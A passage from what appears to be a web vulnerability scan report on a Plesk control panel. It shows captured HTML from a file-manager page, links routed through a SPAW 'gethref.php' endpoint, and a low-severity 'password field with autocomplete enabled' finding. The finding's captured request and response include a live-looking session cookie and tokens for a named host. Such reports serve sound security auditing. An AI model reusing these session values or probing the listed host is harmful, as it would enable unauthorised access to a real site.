&lt;strong&gt;&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/desktop/intro&quot;&gt;Parallels&amp;reg;&lt;br /&gt;Desktop for Mac&lt;/a&gt;&lt;/strong&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/desktop/intro&quot;&gt;&lt;img src=&quot;http://www.vulnerable.host.fqdn:8880/spaw/getimg.php?img=img/apps/pd-box.gif&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;
&lt;p&gt;The best solution for running Windows, Linux, or any of many other operating systems alongside OS X.&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;column right&quot;&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/desktop/pd4wl/intro&quot;&gt;Parallels&amp;reg; Desktop for&lt;br /&gt;Windows and Linux&lt;/a&gt;&lt;/strong&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/desktop/pd4wl/intro&quot;&gt;&lt;img src=&quot;http://www.vulnerable.host.fqdn:8880/spaw/getimg.php?img=img/apps/pdfwl-box.gif&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;
&lt;p&gt;Simultaneously run multiple operating systems on your PC&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;box-vz-products&quot; style=&quot;display: none&quot;&gt;
&lt;h3&gt;Business Products&lt;/h3&gt;
&lt;div class=&quot;box&quot;&gt;
&lt;em class=&quot;tl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;tr&quot;&gt;&lt;/em&gt;&lt;em class=&quot;bl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;br&quot;&gt;&lt;/em&gt;
&lt;div class=&quot;content&quot;&gt;
&lt;div class=&quot;column left&quot;&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/server/intro&quot;&gt;Parallels&amp;reg; Server&lt;/a&gt;&lt;/strong&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/server/intro&quot;&gt;&lt;img src=&quot;http://www.vulnerable.host.fqdn:8880/spaw/getimg.php?img=img/apps/server-box.gif&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;
&lt;p&gt;Hypervisor Virtualization technology for&lt;br /&gt;using many OSs&lt;br /&gt;on one server&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;column right&quot;&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/containers/intro&quot;&gt;Parallels&amp;reg; Container&lt;/a&gt;&lt;/strong&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/containers/intro&quot;&gt;&lt;img src=&quot;http://www.vulnerable.host.fqdn:8880/spaw/getimg.php?img=img/apps/container-box.gif&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;
&lt;p&gt;Our Container solution creates the highest density of virtualized servers&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Service Provider Products&lt;/h3&gt;
&lt;div class=&quot;box&quot;&gt;
&lt;em class=&quot;tl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;tr&quot;&gt;&lt;/em&gt;&lt;em class=&quot;bl&quot;&gt;&lt;/em&gt;&lt;em class=&quot;br&quot;&gt;&lt;/em&gt;
&lt;div class=&quot;content&quot;&gt;
&lt;div class=&quot;column left&quot;&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/automation/intro&quot;&gt;Parallels&amp;reg; Automation&lt;/a&gt;&lt;/strong&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/automation/intro&quot;&gt;&lt;img src=&quot;http://www.vulnerable.host.fqdn:8880/spaw/getimg.php?img=img/apps/poa-box.gif&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;
&lt;p&gt;Hosting, SaaS, and cloud computing automation solution.&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;column right&quot;&gt;
&lt;strong&gt;&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/panel/intro&quot;&gt;Parallels&amp;reg; Panel&lt;/a&gt;&lt;/strong&gt;
&lt;a href=&quot;http://www.vulnerable.host.fqdn:8880/spaw/gethref.php?img=http://www.parallels.com/products/panel/intro&quot;&gt;&lt;img src=&quot;http://www.vulnerable.host.fqdn:8880/spaw/getimg.php?img=img/apps/pcp-box.gif&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;
&lt;p&gt;The Best Control Panel Ever For Easy, Complete and Profitable Hosting&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt; @@BEGIN_OF_COMMENT /#body @@END_OF_COMMENT

&lt;script type=&quot;text/javascript&quot;&gt;
//&lt;![CDATA[
if (window.plesk_promo.virtuozzo) {
var boxVzProducts = document.getElementById('box-vz-products');
boxVzProducts.style.display = 'block';
}
//]]&gt;
&lt;/script&gt;

&lt;div class=&quot;footer&quot;&gt;
&lt;div class=&quot;footer-area&quot;&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
//&lt;![CDATA[
if (window.product_copyrights) { writeFooter(); }
//]]&gt;
&lt;/script&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;script type=&quot;text/javascript&quot;&gt;(function(){var D=document,W=window;function A(){if(W.plesk){return;}W.plesk=1;if(D.getElementsByTagName){var S=D.getElementsByTagName(&quot;head&quot;)[0].appendChild(D.createElement(&quot;script&quot;));S.setAttribute(&quot;type&quot;,&quot;text/javascript&quot;);S.setAttribute(&quot;src&quot;,&quot;http://promo.parallels.com/js/promo.plesk.js&quot;)}}if(D.addEventListener){D.addEventListener(&quot;DOMContentLoaded&quot;,A,false)}/*@cc_on D.write(&quot;\x3cscript id=\&quot;_IE_onload\&quot; defer=\&quot;defer\&quot; src=\&quot;javascript:void(0)\&quot;&gt;\x3c\/script&gt;&quot;);(D.getElementById(&quot;_IE_onload&quot;)).onreadystatechange=function(){if(this.readyState==&quot;complete&quot;){A()}};@*/if(/WebK/i.test(navigator.userAgent)){var C=setInterval(function(){if(/loaded|complete/.test(D.readyState)){clearInterval(C);A()}},10)}W[/*@cc_on !@*/0?'attachEvent':'addEventListener'](/*@cc_on 'on'+@*/'load',A,false)})()&lt;/script&gt;
</textarea><input type="hidden" id="SPAW_spaw2_editor_mode" name="SPAW_spaw2_editor_mode" value="design"><input type="hidden" id="SPAW_spaw2_lang" value="en"><input type="hidden" id="SPAW_spaw2_theme" value="default"><input type="hidden" id="SPAW_spaw2_borders" value="on"><iframe id="spaw2_rEdit" style="width:100%; height:300px; direction:ltr;" class="SPAW_default_editarea" frameborder="no" src="/spaw/empty.html"></iframe><br>
<script language="javascript">
<!--
var spaw_tmpstr="";
if (window.onload != null) {
spaw_tmpstr = window.onload.toString();
var spaw_i = spaw_tmpstr.indexOf("{") + 2;
spaw_tmpstr = spaw_tmpstr.substr(spaw_i,spaw_tmpstr.length-spaw_i-2);
}
window.onload = new Function("SPAW_editorInit('spaw2','/spaw/wysiwyg.css','ltr');" + spaw_tmpstr);
//--></script></td><td id="SPAW_spaw2_toolbar_right_design" valign="top" class="SPAW_default_toolbar"></td><td id="SPAW_spaw2_toolbar_right_html" valign="top" class="SPAW_default_toolbar" style="display : none;"></td></tr><tr><td class="SPAW_default_toolbar"></td><td id="SPAW_spaw2_toolbar_bottom_design" class="SPAW_default_toolbar" width="100%"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td align="right" valign="top" class="SPAW_default_toolbar_bottom" nowrap="yes"><img id="SPAW_spaw2_tb_design_tab_on" alt="" src="/spaw/lib/themes/default/img/tb_design_tab_on.gif" unselectable="on"><img id="SPAW_spaw2_tb_html_tab" alt="Switch to HTML (code) mode" title="Switch to HTML (code) mode" src="/spaw/lib/themes/default/img/tb_html_tab.gif" onClick="SPAW_html_tab_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"></td></tr></table></td><td id="SPAW_spaw2_toolbar_bottom_html" class="SPAW_default_toolbar" width="100%" style="display : none;"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td align="right" valign="top" class="SPAW_default_toolbar_bottom" nowrap="yes"><img id="SPAW_spaw2_tb_design_tab" alt="Switch to WYSIWYG (design) mode" title="Switch to WYSIWYG (design) mode" src="/spaw/lib/themes/default/img/tb_design_tab.gif" onClick="SPAW_design_tab_click('spaw2',this)" class="SPAW_default_tb_out" onMouseOver="SPAW_default_bt_over(this)" onMouseOut="SPAW_default_bt_out(this)" onMouseDown="SPAW_default_bt_down(this)" onMouseUp="SPAW_default_bt_up(this)" unselectable="on"><img id="SPAW_spaw2_tb_html_tab_on" alt="" src="/spaw/lib/themes/default/img/tb_html_tab_on.gif" unselectable="on"></td></tr></table></td><td class="SPAW_default_toolbar"></td></tr></table>
   </td></tr></table></fieldset>

   <fieldset>
       <legend>Saving settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>
       <table class="formFields" cellspacing="0" width="100%">
           <tr>
               <td class="name">Save in the following encoding:</td>
               <td><select name="save_codepage" id="fid-save_codepage" >    <option value='437'>437</option>
   <option value='850'>850</option>
   <option value='852'>852</option>
   <option value='855'>855</option>
   <option value='857'>857</option>
   <option value='860'>860</option>
   <option value='861'>861</option>
   <option value='862'>862</option>
   <option value='863'>863</option>
   <option value='865'>865</option>
   <option value='866'>866</option>
   <option value='869'>869</option>
   <option value='ANSI_X3.4-1968'>ANSI_X3.4-1968</option>
   <option value='ANSI_X3.4-1986'>ANSI_X3.4-1986</option>
   <option value='ARABIC'>ARABIC</option>
   <option value='ARMSCII-8'>ARMSCII-8</option>
   <option value='ASCII'>ASCII</option>
   <option value='ASMO-708'>ASMO-708</option>
   <option value='BIG-5'>BIG-5</option>
   <option value='BIG-FIVE'>BIG-FIVE</option>
   <option value='BIG5'>BIG5</option>
   <option value='BIG5-HKSCS'>BIG5-HKSCS</option>
   <option value='BIG5HKSCS'>BIG5HKSCS</option>
   <option value='BIGFIVE'>BIGFIVE</option>
   <option value='C99'>C99</option>
   <option value='CN'>CN</option>
   <option value='CN-BIG5'>CN-BIG5</option>
   <option value='CN-GB'>CN-GB</option>
   <option value='CP-GR'>CP-GR</option>
   <option value='CP1125'>CP1125</option>
   <option value='CP1133'>CP1133</option>
   <option value='CP1250'>CP1250</option>
   <option value='CP1251'>CP1251</option>
   <option value='CP1252'>CP1252</option>
   <option value='CP1253'>CP1253</option>
   <option value='CP1254'>CP1254</option>
   <option value='CP1255'>CP1255</option>
   <option value='CP1256'>CP1256</option>
   <option value='CP1257'>CP1257</option>
   <option value='CP1258'>CP1258</option>
   <option value='CP1361'>CP1361</option>
   <option value='CP367'>CP367</option>
   <option value='CP437'>CP437</option>
   <option value='CP737'>CP737</option>
   <option value='CP775'>CP775</option>
   <option value='CP819'>CP819</option>
   <option value='CP850'>CP850</option>
   <option value='CP852'>CP852</option>
   <option value='CP853'>CP853</option>
   <option value='CP855'>CP855</option>
   <option value='CP857'>CP857</option>
   <option value='CP858'>CP858</option>
   <option value='CP860'>CP860</option>
   <option value='CP861'>CP861</option>
   <option value='CP862'>CP862</option>
   <option value='CP863'>CP863</option>
   <option value='CP864'>CP864</option>
   <option value='CP865'>CP865</option>
   <option value='CP866'>CP866</option>
   <option value='CP869'>CP869</option>
   <option value='CP874'>CP874</option>
   <option value='CP932'>CP932</option>
   <option value='CP936'>CP936</option>
   <option value='CP949'>CP949</option>
   <option value='CP950'>CP950</option>
   <option value='CSASCII'>CSASCII</option>
   <option value='CSEUCKR'>CSEUCKR</option>
   <option value='CSEUCPKDFMTJAPANESE'>CSEUCPKDFMTJAPANESE</option>
   <option value='CSGB2312'>CSGB2312</option>
   <option value='CSHPROMAN8'>CSHPROMAN8</option>
   <option value='CSIBM855'>CSIBM855</option>
   <option value='CSIBM857'>CSIBM857</option>
   <option value='CSIBM860'>CSIBM860</option>
   <option value='CSIBM863'>CSIBM863</option>
   <option value='CSIBM864'>CSIBM864</option>
   <option value='CSIBM865'>CSIBM865</option>
   <option value='CSIBM866'>CSIBM866</option>
   <option value='CSIBM869'>CSIBM869</option>
   <option value='CSISO14JISC6220RO'>CSISO14JISC6220RO</option>
   <option value='CSISO2022CN'>CSISO2022CN</option>
   <option value='CSISO2022JP'>CSISO2022JP</option>
   <option value='CSISO2022JP2'>CSISO2022JP2</option>
   <option value='CSISO2022KR'>CSISO2022KR</option>
   <option value='CSISOLATIN1'>CSISOLATIN1</option>
   <option value='CSISOLATIN2'>CSISOLATIN2</option>
   <option value='CSISOLATIN3'>CSISOLATIN3</option>
   <option value='CSISOLATIN4'>CSISOLATIN4</option>
   <option value='CSISOLATIN5'>CSISOLATIN5</option>
   <option value='CSISOLATIN6'>CSISOLATIN6</option>
   <option value='CSISOLATINARABIC'>CSISOLATINARABIC</option>
   <option value='CSISOLATINCYRILLIC'>CSISOLATINCYRILLIC</option>
   <option value='CSISOLATINGREEK'>CSISOLATINGREEK</option>
   <option value='CSISOLATINHEBREW'>CSISOLATINHEBREW</option>
   <option value='CSKOI8R'>CSKOI8R</option>
   <option value='CSMACINTOSH'>CSMACINTOSH</option>
   <option value='CSPC775BALTIC'>CSPC775BALTIC</option>
   <option value='CSPC850MULTILINGUAL'>CSPC850MULTILINGUAL</option>
   <option value='CSPC862LATINHEBREW'>CSPC862LATINHEBREW</option>
   <option value='CSPC8CODEPAGE437'>CSPC8CODEPAGE437</option>
   <option value='CSPCP852'>CSPCP852</option>
   <option value='CSSHIFTJIS'>CSSHIFTJIS</option>
   <option value='CSUCS4'>CSUCS4</option>
   <option value='CSUNICODE'>CSUNICODE</option>
   <option value='CYRILLIC'>CYRILLIC</option>
   <option value='ECMA-114'>ECMA-114</option>
   <option value='ECMA-118'>ECMA-118</option>
   <option value='ELOT_928'>ELOT_928</option>
   <option value='EUC-CN'>EUC-CN</option>
   <option value='EUC-JP'>EUC-JP</option>
   <option value='EUC-KR'>EUC-KR</option>
   <option value='EUC-TW'>EUC-TW</option>
   <option value='EUCCN'>EUCCN</option>
   <option value='EUCJP'>EUCJP</option>
   <option value='EUCKR'>EUCKR</option>
   <option value='EUCTW'>EUCTW</option>
   <option value='GB18030'>GB18030</option>
   <option value='GB2312'>GB2312</option>
   <option value='GBK'>GBK</option>
   <option value='GB_1988-80'>GB_1988-80</option>
   <option value='GEORGIAN-ACADEMY'>GEORGIAN-ACADEMY</option>
   <option value='GEORGIAN-PS'>GEORGIAN-PS</option>
   <option value='GREEK'>GREEK</option>
   <option value='GREEK8'>GREEK8</option>
   <option value='Georgian-Academy'>Georgian-Academy</option>
   <option value='Georgian-PS'>Georgian-PS</option>
   <option value='HEBREW'>HEBREW</option>
   <option value='HP-ROMAN8'>HP-ROMAN8</option>
   <option value='HZ'>HZ</option>
   <option value='IBM367'>IBM367</option>
   <option value='IBM437'>IBM437</option>
   <option value='IBM775'>IBM775</option>
   <option value='IBM819'>IBM819</option>
   <option value='IBM850'>IBM850</option>
   <option value='IBM852'>IBM852</option>
   <option value='IBM855'>IBM855</option>
   <option value='IBM857'>IBM857</option>
   <option value='IBM860'>IBM860</option>
   <option value='IBM861'>IBM861</option>
   <option value='IBM862'>IBM862</option>
   <option value='IBM863'>IBM863</option>
   <option value='IBM864'>IBM864</option>
   <option value='IBM865'>IBM865</option>
   <option value='IBM866'>IBM866</option>
   <option value='IBM869'>IBM869</option>
   <option value='ISO-2022-CN'>ISO-2022-CN</option>
   <option value='ISO-2022-CN-EXT'>ISO-2022-CN-EXT</option>
   <option value='ISO-2022-JP'>ISO-2022-JP</option>
   <option value='ISO-2022-JP-1'>ISO-2022-JP-1</option>
   <option value='ISO-2022-JP-2'>ISO-2022-JP-2</option>
   <option value='ISO-2022-KR'>ISO-2022-KR</option>
   <option value='ISO-8859-1'>ISO-8859-1</option>
   <option value='ISO-8859-10'>ISO-8859-10</option>
   <option value='ISO-8859-13'>ISO-8859-13</option>
   <option value='ISO-8859-14'>ISO-8859-14</option>
   <option value='ISO-8859-15'>ISO-8859-15</option>
   <option value='ISO-8859-16'>ISO-8859-16</option>
   <option value='ISO-8859-2'>ISO-8859-2</option>
   <option value='ISO-8859-3'>ISO-8859-3</option>
   <option value='ISO-8859-4'>ISO-8859-4</option>
   <option value='ISO-8859-5'>ISO-8859-5</option>
   <option value='ISO-8859-6'>ISO-8859-6</option>
   <option value='ISO-8859-7'>ISO-8859-7</option>
   <option value='ISO-8859-8'>ISO-8859-8</option>
   <option value='ISO-8859-9'>ISO-8859-9</option>
   <option value='ISO-CELTIC'>ISO-CELTIC</option>
   <option value='ISO-IR-100'>ISO-IR-100</option>
   <option value='ISO-IR-101'>ISO-IR-101</option>
   <option value='ISO-IR-109'>ISO-IR-109</option>
   <option value='ISO-IR-110'>ISO-IR-110</option>
   <option value='ISO-IR-126'>ISO-IR-126</option>
   <option value='ISO-IR-127'>ISO-IR-127</option>
   <option value='ISO-IR-138'>ISO-IR-138</option>
   <option value='ISO-IR-14'>ISO-IR-14</option>
   <option value='ISO-IR-144'>ISO-IR-144</option>
   <option value='ISO-IR-148'>ISO-IR-148</option>
   <option value='ISO-IR-157'>ISO-IR-157</option>
   <option value='ISO-IR-166'>ISO-IR-166</option>
   <option value='ISO-IR-179'>ISO-IR-179</option>
   <option value='ISO-IR-199'>ISO-IR-199</option>
   <option value='ISO-IR-203'>ISO-IR-203</option>
   <option value='ISO-IR-226'>ISO-IR-226</option>
   <option value='ISO-IR-57'>ISO-IR-57</option>
   <option value='ISO-IR-6'>ISO-IR-6</option>
   <option value='ISO646-CN'>ISO646-CN</option>
   <option value='ISO646-JP'>ISO646-JP</option>
   <option value='ISO646-US'>ISO646-US</option>
   <option value='ISO_646.IRV:1991'>ISO_646.IRV:1991</option>
   <option value='ISO_8859-1'>ISO_8859-1</option>
   <option value='ISO_8859-10'>ISO_8859-10</option>
   <option value='ISO_8859-10:1992'>ISO_8859-10:1992</option>
   <option value='ISO_8859-14'>ISO_8859-14</option>
   <option value='ISO_8859-14:1998'>ISO_8859-14:1998</option>
   <option value='ISO_8859-15'>ISO_8859-15</option>
   <option value='ISO_8859-15:1998'>ISO_8859-15:1998</option>
   <option value='ISO_8859-16'>ISO_8859-16</option>
   <option value='ISO_8859-1:1987'>ISO_8859-1:1987</option>
   <option value='ISO_8859-2'>ISO_8859-2</option>
   <option value='ISO_8859-2:1987'>ISO_8859-2:1987</option>
   <option value='ISO_8859-3'>ISO_8859-3</option>
   <option value='ISO_8859-3:1988'>ISO_8859-3:1988</option>
   <option value='ISO_8859-4'>ISO_8859-4</option>
   <option value='ISO_8859-4:1988'>ISO_8859-4:1988</option>
   <option value='ISO_8859-5'>ISO_8859-5</option>
   <option value='ISO_8859-5:1988'>ISO_8859-5:1988</option>
   <option value='ISO_8859-6'>ISO_8859-6</option>
   <option value='ISO_8859-6:1987'>ISO_8859-6:1987</option>
   <option value='ISO_8859-7'>ISO_8859-7</option>
   <option value='ISO_8859-7:1987'>ISO_8859-7:1987</option>
   <option value='ISO_8859-8'>ISO_8859-8</option>
   <option value='ISO_8859-8:1988'>ISO_8859-8:1988</option>
   <option value='ISO_8859-9'>ISO_8859-9</option>
   <option value='ISO_8859-9:1989'>ISO_8859-9:1989</option>
   <option value='JAVA'>JAVA</option>
   <option value='JIS_C6220-1969-RO'>JIS_C6220-1969-RO</option>
   <option value='JOHAB'>JOHAB</option>
   <option value='JP'>JP</option>
   <option value='KOI8-R'>KOI8-R</option>
   <option value='KOI8-RU'>KOI8-RU</option>
   <option value='KOI8-T'>KOI8-T</option>
   <option value='KOI8-U'>KOI8-U</option>
   <option value='L1'>L1</option>
   <option value='L2'>L2</option>
   <option value='L3'>L3</option>
   <option value='L4'>L4</option>
   <option value='L5'>L5</option>
   <option value='L6'>L6</option>
   <option value='L7'>L7</option>
   <option value='L8'>L8</option>
   <option value='LATIN1'>LATIN1</option>
   <option value='LATIN2'>LATIN2</option>
   <option value='LATIN3'>LATIN3</option>
   <option value='LATIN4'>LATIN4</option>
   <option value='LATIN5'>LATIN5</option>
   <option value='LATIN6'>LATIN6</option>
   <option value='LATIN7'>LATIN7</option>
   <option value='LATIN8'>LATIN8</option>
   <option value='MAC'>MAC</option>
   <option value='MACARABIC'>MACARABIC</option>
   <option value='MACCENTRALEUROPE'>MACCENTRALEUROPE</option>
   <option value='MACCROATIAN'>MACCROATIAN</option>
   <option value='MACCYRILLIC'>MACCYRILLIC</option>
   <option value='MACGREEK'>MACGREEK</option>
   <option value='MACHEBREW'>MACHEBREW</option>
   <option value='MACICELAND'>MACICELAND</option>
   <option value='MACINTOSH'>MACINTOSH</option>
   <option value='MACROMAN'>MACROMAN</option>
   <option value='MACROMANIA'>MACROMANIA</option>
   <option value='MACTURKISH'>MACTURKISH</option>
   <option value='MACUKRAINE'>MACUKRAINE</option>
   <option value='MS-ANSI'>MS-ANSI</option>
   <option value='MS-ARAB'>MS-ARAB</option>
   <option value='MS-CYRL'>MS-CYRL</option>
   <option value='MS-EE'>MS-EE</option>
   <option value='MS-GREEK'>MS-GREEK</option>
   <option value='MS-HEBR'>MS-HEBR</option>
   <option value='MS-TURK'>MS-TURK</option>
   <option value='MS_KANJI'>MS_KANJI</option>
   <option value='MacThai'>MacThai</option>
   <option value='MuleLao-1'>MuleLao-1</option>
   <option value='NEXTSTEP'>NEXTSTEP</option>
   <option value='R8'>R8</option>
   <option value='ROMAN8'>ROMAN8</option>
   <option value='SHIFT-JIS'>SHIFT-JIS</option>
   <option value='SHIFT_JIS'>SHIFT_JIS</option>
   <option value='SJIS'>SJIS</option>
   <option value='TCVN'>TCVN</option>
   <option value='TCVN-5712'>TCVN-5712</option>
   <option value='TCVN5712-1'>TCVN5712-1</option>
   <option value='TCVN5712-1:1993'>TCVN5712-1:1993</option>
   <option value='TIS-620'>TIS-620</option>
   <option value='TIS620'>TIS620</option>
   <option value='TIS620-0'>TIS620-0</option>
   <option value='TIS620.2529-1'>TIS620.2529-1</option>
   <option value='TIS620.2533-0'>TIS620.2533-0</option>
   <option value='UCS-2'>UCS-2</option>
   <option value='UCS-2-INTERNAL'>UCS-2-INTERNAL</option>
   <option value='UCS-2BE'>UCS-2BE</option>
   <option value='UCS-2LE'>UCS-2LE</option>
   <option value='UCS-4'>UCS-4</option>
   <option value='UCS-4-INTERNAL'>UCS-4-INTERNAL</option>
   <option value='UCS-4BE'>UCS-4BE</option>
   <option value='UCS-4LE'>UCS-4LE</option>
   <option value='UHC'>UHC</option>
   <option value='UNICODEBIG'>UNICODEBIG</option>
   <option value='UNICODELITTLE'>UNICODELITTLE</option>
   <option value='US'>US</option>
   <option value='US-ASCII'>US-ASCII</option>
   <option value='UTF-16'>UTF-16</option>
   <option value='UTF-16BE'>UTF-16BE</option>
   <option value='UTF-16LE'>UTF-16LE</option>
   <option value='UTF-32'>UTF-32</option>
   <option value='UTF-32BE'>UTF-32BE</option>
   <option value='UTF-32LE'>UTF-32LE</option>
   <option value='UTF-7'>UTF-7</option>
   <option value='UTF-8' SELECTED>UTF-8</option>
   <option value='VISCII'>VISCII</option>
   <option value='WINBALTRIM'>WINBALTRIM</option>
   <option value='WINDOWS-1250'>WINDOWS-1250</option>
   <option value='WINDOWS-1251'>WINDOWS-1251</option>
   <option value='WINDOWS-1252'>WINDOWS-1252</option>
   <option value='WINDOWS-1253'>WINDOWS-1253</option>
   <option value='WINDOWS-1254'>WINDOWS-1254</option>
   <option value='WINDOWS-1255'>WINDOWS-1255</option>
   <option value='WINDOWS-1256'>WINDOWS-1256</option>
   <option value='WINDOWS-1257'>WINDOWS-1257</option>
   <option value='WINDOWS-1258'>WINDOWS-1258</option>
</select>
</td>
           </tr>
           <tr>
               <td class="name"><label for="fid-save_as">Save as</label></td>
               <td>
                   <input type="checkbox" class="checkbox" value="true" id="fid-save_as" name="save_as" onClick="save_as_oC(getForm(this));">
                   <input type="text" id="fid-save_as_file" name="save_as_file" size="35" maxlength="255" value="/httpdocs/index.html">
               </td>
           </tr>
       </table>
   </td></tr></table></fieldset>

   
   <div class="formArea">
       <input name="cmd" type="hidden" value="update">
       <input name="header" type="hidden" value="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">
       <input name="footer" type="hidden" value="PC9ib2R5Pg0KPC9odG1sPg0K">
       <input name="file_name" type="hidden" value="/httpdocs/index.html">
       <input name="forgery_protection_token" type="hidden" value="bdaafe67daaa200e2f077bd9577b09f4">

       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"></td>
           <td class="misc" width="0"><nobr>
               <DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);update_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);update_oC(document.forms[0]);;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV>
               <DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@/domain@1/hosting/file-manager/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@/domain@1/hosting/file-manager/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV>
           </nobr></td>
       </tr></table>
   </div>
</div>
</form>
   </div>
   </td></tr></table>
   
   <div id="bottomAnchor"></div>
   </body>
</html>

6. Password field with autocomplete enabled
There are 8 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


6.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/properties/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/ftp-repository/properties/

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /plesk/client@2/domain@1/backup/ftp-repository/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/local-repository/
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:39:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:39:00 GMT
Connection: close
Content-Length: 15143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="48333f77aef379c04c82252b59636182" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
